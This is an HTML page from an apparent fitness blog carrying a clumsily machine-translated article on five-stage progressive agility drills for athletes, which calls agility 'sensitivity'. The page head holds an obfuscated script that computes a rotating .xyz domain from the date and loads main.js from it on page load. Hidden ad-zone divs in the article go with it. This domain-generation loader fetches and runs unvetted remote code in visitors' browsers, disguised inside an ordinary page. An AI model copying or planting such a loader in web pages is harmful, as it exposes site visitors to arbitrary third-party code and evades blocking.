<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Reduced fat,">










<meta name="description" content="As one of the important physical qualities of athletes, agility is the key skill in many sports. Good sensitivity reflects that athletes have good perception and decision-making ability, as well as co">
<meta name="keywords" content="Reduced fat">
<meta property="og:type" content="article">
<meta property="og:title" content="Practice progressive technical training, advanced sensitive ability and high level">
<meta property="og:url" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/index.html">
<meta property="og:site_name" content="How to Keep Fit">
<meta property="og:description" content="As one of the important physical qualities of athletes, agility is the key skill in many sports. Good sensitivity reflects that athletes have good perception and decision-making ability, as well as co">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/2850af14-d18c-4b50-9fa1-d22e429a85f9.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/f81247c0-0d6e-42b0-9721-a7a03ee1514c.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/52f32b65-0f0d-4bc1-a124-5c6c1b6f8a35.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/7111613d-6de7-4b63-ad2e-720ccd1bb7e6.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/af7524f7-4b7c-479a-9215-5129eef1e5d1.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/777d7fce-38c9-45ba-a1c7-d87f66780cda.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/1b154724-cbea-4dc8-b720-5a9c0d0206a2.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/5558f7c3-a91b-4fd4-8e48-544bd4c0dcbc.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/1a64402f-8f9c-4b40-bc55-d8c52ceb63ff.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/c6e093d4-a0e6-4878-b3b7-fc793525dedc.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/58c4d834-9bb2-4762-90df-5de1d39054dd.gif">
<meta property="og:updated_time" content="2021-05-06T07:20:36.522Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Practice progressive technical training, advanced sensitive ability and high level">
<meta name="twitter:description" content="As one of the important physical qualities of athletes, agility is the key skill in many sports. Good sensitivity reflects that athletes have good perception and decision-making ability, as well as co">
<meta name="twitter:image" content="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/2850af14-d18c-4b50-9fa1-d22e429a85f9.gif">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Practice progressive technical training, advanced sensitive ability and high level | How to Keep Fit</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">How to Keep Fit</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">How to Keep Fit</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>


 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
                            
<div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="15af66dea7db40aeac9404abd8ac7ee3" style="display: none"></div>
<div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="957010872ca54cf98941765c8f125165" style="display: none"></div>
<div class="_fa7cdd4c68507744" data-zone="1f18e43b8b0e495c9b6b7be51eb2c8c2" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>


  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Thomas">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="How to Keep Fit">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Practice progressive technical training, advanced sensitive ability and high level</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-03-26T00:00:00+08:00">
                2021-03-26
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>As one of the important physical qualities of athletes, agility is the key skill in many sports. Good sensitivity reflects that athletes have good perception and decision-making ability, as well as coordinated and powerful movement speed quality, which is conducive to the transformation of athletes’ posture and center of gravity, and can also improve the performance level of athletes. Therefore, the development of sensitivity is essential and crucial. Today, I’d like to introduce a progressive training method for developing sensitivity.<br><img src="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/2850af14-d18c-4b50-9fa1-d22e429a85f9.gif" alt="Practice progressive technical training, advanced sensitive ability and high level"><br>The progressive technique training of developing sensitive ability is mainly divided into five stages. The first four stages include linear acceleration, transition movement and direction changing. The fifth stage is to integrate all techniques into an open sensitivity training.<br><img src="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/f81247c0-0d6e-42b0-9721-a7a03ee1514c.gif" alt="Practice progressive technical training, advanced sensitive ability and high level"><br>First stage training: linear acceleration<br>Hold the wall and lift the knee<br><img src="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/52f32b65-0f0d-4bc1-a124-5c6c1b6f8a35.gif" alt="Practice progressive technical training, advanced sensitive ability and high level"><br>The athletes hold the wall with both hands, stand on the ground with their feet flat, bend their ankles back, straighten their arms, and tilt their trunks at an angle of 45 degrees to the ground.<br>Run uphill<br>5 to 6 groups of accelerated running training (interval between groups until the athletes fully recover) were conducted on the slope of 3 to 8 degrees and the slope length of 10 to 20 meters.<br>First stage training: transition movement<br><img src="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/7111613d-6de7-4b63-ad2e-720ccd1bb7e6.gif" alt="Practice progressive technical training, advanced sensitive ability and high level"><br>Practice independent techniques such as backward step, side slide step and cross step between two sign barrels 6 to 10 meters apart.<br>First stage training: change direction<br><img src="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/af7524f7-4b7c-479a-9215-5129eef1e5d1.gif" alt="Practice progressive technical training, advanced sensitive ability and high level"><br>Athletes jog from 3 to 5 meters to the mark barrel (with the improvement of technology, speed up). At the mark barrel, the athlete completes the change direction cut in action, and the athlete’s cut in direction should be changed alternately during training.<br>Phase 2: linear acceleration<br>Two steps against the wall<br>Starting from the knee forward position of one leg, drive the raised leg to push backward while the knee joint of the other leg flexes forward. In the process, maintain all technical essentials. After reaching the proficiency level, it can be repeated three or more times.<br>Forward movement training against peer resistance<br><img src="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/777d7fce-38c9-45ba-a1c7-d87f66780cda.gif" alt="Practice progressive technical training, advanced sensitive ability and high level"><br>Stand with your legs together and lean forward to your partner (if any). The partner is responsible for holding you when you lean forward. When all your weight falls on your partner, the partner will step aside and let you fall forward. If you don’t have a partner to help you, you can keep your body in the right position first, then lean forward until you lose your balance. As soon as you remove the force that holds you, and you start to fall forward, you need to accelerate immediately.<br>15 meter acceleration training<br>Athletes start with static or dynamic training, and carry out maximum acceleration training.<br>Second stage training: transition movement<br>Quadrilateral agility training<br><img src="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/1b154724-cbea-4dc8-b720-5a9c0d0206a2.gif" alt="Practice progressive technical training, advanced sensitive ability and high level"><br>Athletes circle 10 meters × 10 meters square, forward sprint, then transition to side slide, back step, and then side slide back to the starting point. The focus of the training is to change the movement quickly every time the athlete reaches the marker barrel.<br>Second stage training: change direction<br>● training of changing direction and cutting in for standing players (slow)<br>The athlete is 3 to 5 meters away from his stationary partner and begins to jog towards him (with the improvement of technique, speed up). The position of the stationary partner enables the athlete to effectively judge the distance to execute the turn cut. The cut in direction should be changed alternately.<br>The third stage training: linear acceleration<br>15 meter downhill acceleration training<br>5 to 6 groups of downhill acceleration training were conducted on the slope of 15 meters.<br>Face to face standing, turning and chasing training<br>At the beginning, the two athletes were 5 meters apart and stood face to face. The target line is 15 meters behind each of the two athletes. When receiving certain instructions or seeing visual signals, an athlete starts to run towards the line opposite him. Another athlete has a 5-meter buffer zone, and during the first athlete’s running time in the buffer zone, he can turn around and accelerate towards the same line. In this way, the two athletes form a state of chasing each other.<br>The third stage training: transition movement<br>Training with peers<br><img src="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/5558f7c3-a91b-4fd4-8e48-544bd4c0dcbc.gif" alt="Practice progressive technical training, advanced sensitive ability and high level"><br>The distance between the two players is 2 meters. Player a is the leader and player B is the follower. In mirror training, the follower needs to follow the leader’s action accurately and keep face-to-face position. The leader can move left and right or back and forth.<br>Third stage training: changing direction<br>Mobile team member’s direction changing cut training (with a certain rhythm)<br>Athletes from 3 to 5 meters, speed up to run to the mobile partner (with the improvement of technology, the pace is accelerated). When the athletes show their ability, the movement speed of the companions should be gradually increased, and the pressure on the practitioners should be appropriately increased.<br>The fourth stage: from action to linear acceleration<br>Sign bucket training<br><img src="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/1a64402f-8f9c-4b40-bc55-d8c52ceb63ff.gif" alt="Practice progressive technical training, advanced sensitive ability and high level"><br>Athletes start from No.1 barrel, slide to No.2 barrel, turn to No.3 barrel, and then slide to No.1 barrel. Then the coach calls out a sign bucket number, and the athlete accelerates to the corresponding sign bucket.<br>The fourth stage training: transition movement<br>Training with peers<br>The mirror practice in the fourth stage needs a third person to participate. The third person decides the direction of the athlete’s movement with his fingers in one direction. When the direction needs to be changed, he will change hands. No. 1 athletes respond to external stimuli (rather than self decision-making), while No. 2 athletes respond according to the actions of No. 1 athletes.<br>The fourth stage training: direction change in linear acceleration<br>The training of sprint and direction changing among peers<br><img src="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/c6e093d4-a0e6-4878-b3b7-fc793525dedc.gif" alt="Practice progressive technical training, advanced sensitive ability and high level"><br>The two athletes were 20 meters apart, standing face to face. When the coach gives the “start” command, the athlete sprints to the 10 meter line in front of him, then turns 180 degrees and sprints back. When they meet, they cut left or right to each other and turn around each other. Initially, the direction of the cut can be determined in advance (using the technology they think is most suitable), but as the ability improves, the athlete needs to make the above reaction. Making decisions at high speed is challenging.<br>The fifth stage of training: transition to directional movement and linear acceleration movement<br>Image competition training<br>The two athletes stand face to face 2 meters apart. Athlete a can move in any direction when facing athlete B all the time. B needs to do the mirror action of a, keeping a distance of 2 meters between them. If player a moves forward, then player B moves backward. The training method is roughly the same. At any time, athlete B can issue the “run” command. When the “run” command is issued, athlete B needs to quickly change direction, bypass a and accelerate to the end. Athlete a needs to change direction according to the action of B and race with B to the end.<br>For more details on how to scientifically improve sports performance, please refer to the guide to improving sports skills: exercise and scheme design based on improving sports performance.<br>The above content comes from the guide to improving motor skills: exercise and scheme design based on improving motor performance<br><img src="http://doumaiy.xyz/2021/03/26/Practice progressive technical training, advanced sensitive ability and high level/58c4d834-9bb2-4762-90df-5de1d39054dd.gif" alt="Practice progressive technical training, advanced sensitive ability and high level"><br>Authorized by the people’s Posts and Telecommunications Publishing House, reprint must retain book copyright information: book title, cover, publishing house</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Reduced-fat/" rel="tag"># Reduced fat</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/03/25/A famous American blogger, who dislikes his body and loses more than 200 pounds in six months, is very inspirational/" rel="next" title="A famous American blogger, who dislikes his body and loses more than 200 pounds in six months, is very inspirational">
                <i class="fa fa-chevron-left"></i> A famous American blogger, who dislikes his body and loses more than 200 pounds in six months, is very inspirational
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/03/27/Zhang Zetian loves to keep fit. From milk tea girl to muscle girl, her figure has changed a lot/" rel="prev" title="Zhang Zetian loves to keep fit. From milk tea girl to muscle girl, her figure has changed a lot">
                Zhang Zetian loves to keep fit. From milk tea girl to muscle girl, her figure has changed a lot <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Thomas</p>
              <p class="site-description motion-element" itemprop="description">How to Keep Fit</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">59</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Thomas</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
